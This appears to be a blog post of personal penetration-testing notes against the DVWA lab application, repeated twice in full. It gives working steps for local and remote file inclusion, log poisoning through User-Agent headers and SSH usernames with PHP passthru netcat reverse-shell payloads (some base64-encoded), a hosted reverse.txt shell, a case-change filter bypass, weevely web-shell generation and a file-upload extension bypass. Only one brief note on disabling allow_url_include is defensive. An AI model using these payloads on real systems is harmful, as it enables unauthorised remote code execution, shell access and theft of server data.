File Inclusion
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd --> to get passwords s
-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ========================== using environmental variables
---------------------------------------------------------------------------------------------------------
cat /proc/self/environ --> to see environment variables
Opening Environment variables in the target machine
--> http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ
Now Intercept the request using brup suite -
change the browser name log to a php code in the burp suite in header <?phpinfo()?>
type in command prompt
--> nc -vv -l -p 8888
type in burp suite header (request)
--> <?passthru("nc -e /bin/sh attacker_ip 8888"); ?> // <?passthru("nc -e /bin/sh 192.168.149.128 8888"); ?>
-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ============================================using logs --> var/log/auth.log
--> var/log/apache2/access.log
---------------------------------------------------------------------------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> var/log/auth.log shows the authenticated logs
--> lets try to login using "ssh" into the server and check the logs
ssh random@192.168.149.136
random
--> a log is logged
ssh "<?passthru('nc -e /bin/sh attacker_ip 8888');?>"@victim_IP
need to convert the command into base64 --> nc -e /bin/sh attacker_ip 8888
--> open burpsuite and go to decoder paste: nc -e /bin/sh attacker_ip 8888
--> copy the encoded code and paste in the bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4
ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?>"@victim_IP
-->type in command prompt
nc -vv -l -p 8888
--> now open this
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> In Cmd type
id
ls
pwd
===========================================================================================================
- Remote File Inclusion - Low Security -----------------------------
===========================================================================================================
It is a special case of file inclusion vulnerabilities. if a server configured to allow a certain function caleed allow
url, allow_url fopen. we will be able to include to any file from any computer to the target computer. can upload any
php file. we can run payloads, reverse shells and system commands as well.
In dvwa, remote file inclusion is turned off, we need to turn it on
sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "On"
ctrl +x
yes
sudo /etc/init.d/apache2 restart
file should be stored on a real server with an ip which should be remotely accessible
<?php
passthru("nc -e /bin/sh 192.168.149.128 8080");
?>
save it as reverse.txt file in /var/www/html
open it as http://localhost/reverse.txt --> should be accessible remote if u want to hack a real server
in cmd type
--> nc -vv -l -p 8080
run this now ...
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=http://192.168.149.128/reverse.txt?
whoami
uname -a
ls
pwd
==========================================================================================================
-------------------------- Remote File Inclusion - MediumSecurity -------------
===========================================================================================================
nc -vv -l -p 8080
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt?
securing from Remote file inclusion:
sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "Off"
allow_url_include = Off
ctrl +x
yes
sudo /etc/init.d/apache2 restart v
File upload vulnerability:
--------------------------
Generate a web payload and gain remote connection or access:
--> weevely generate 12345 /root/Desktop/shell.php // 123456 is the password
To run it
--> weevely link_of_shell password
change the extension of the file from php to jpg
modify requests using burpsite while uploading file, change the extension of the file from jpg to php
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd --> to get passwords s
-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ========================== using environmental variables
---------------------------------------------------------------------------------------------------------
cat /proc/self/environ --> to see environment variables
Opening Environment variables in the target machine
--> http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ
Now Intercept the request using brup suite -
change the browser name log to a php code in the burp suite in header <?phpinfo()?>
type in command prompt
--> nc -vv -l -p 8888
type in burp suite header (request)
--> <?passthru("nc -e /bin/sh attacker_ip 8888"); ?> // <?passthru("nc -e /bin/sh 192.168.149.128 8888"); ?>
-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ============================================using logs --> var/log/auth.log
--> var/log/apache2/access.log
---------------------------------------------------------------------------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> var/log/auth.log shows the authenticated logs
--> lets try to login using "ssh" into the server and check the logs
ssh random@192.168.149.136
random
--> a log is logged
ssh "<?passthru('nc -e /bin/sh attacker_ip 8888');?>"@victim_IP
need to convert the command into base64 --> nc -e /bin/sh attacker_ip 8888
--> open burpsuite and go to decoder paste: nc -e /bin/sh attacker_ip 8888
--> copy the encoded code and paste in the bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4
ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?>"@victim_IP
-->type in command prompt
nc -vv -l -p 8888
--> now open this
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> In Cmd type
id
ls
pwd
===========================================================================================================
- Remote File Inclusion - Low Security -----------------------------
===========================================================================================================
It is a special case of file inclusion vulnerabilities. if a server configured to allow a certain function caleed allow
url, allow_url fopen. we will be able to include to any file from any computer to the target computer. can upload any
php file. we can run payloads, reverse shells and system commands as well.
In dvwa, remote file inclusion is turned off, we need to turn it on
sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "On"
ctrl +x
yes
sudo /etc/init.d/apache2 restart
file should be stored on a real server with an ip which should be remotely accessible
<?php
passthru("nc -e /bin/sh 192.168.149.128 8080");
?>
save it as reverse.txt file in /var/www/html
open it as http://localhost/reverse.txt --> should be accessible remote if u want to hack a real server
in cmd type
--> nc -vv -l -p 8080
run this now ...
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=http://192.168.149.128/reverse.txt?
whoami
uname -a
ls
pwd
==========================================================================================================
-------------------------- Remote File Inclusion - MediumSecurity -------------
===========================================================================================================
nc -vv -l -p 8080
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt?
securing from Remote file inclusion:
sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "Off"
allow_url_include = Off
ctrl +x
yes
sudo /etc/init.d/apache2 restart v
File upload vulnerability:
--------------------------
Generate a web payload and gain remote connection or access:
--> weevely generate 12345 /root/Desktop/shell.php // 123456 is the password
To run it
--> weevely link_of_shell password
change the extension of the file from php to jpg
modify requests using burpsite while uploading file, change the extension of the file from jpg to php
Comments
Post a Comment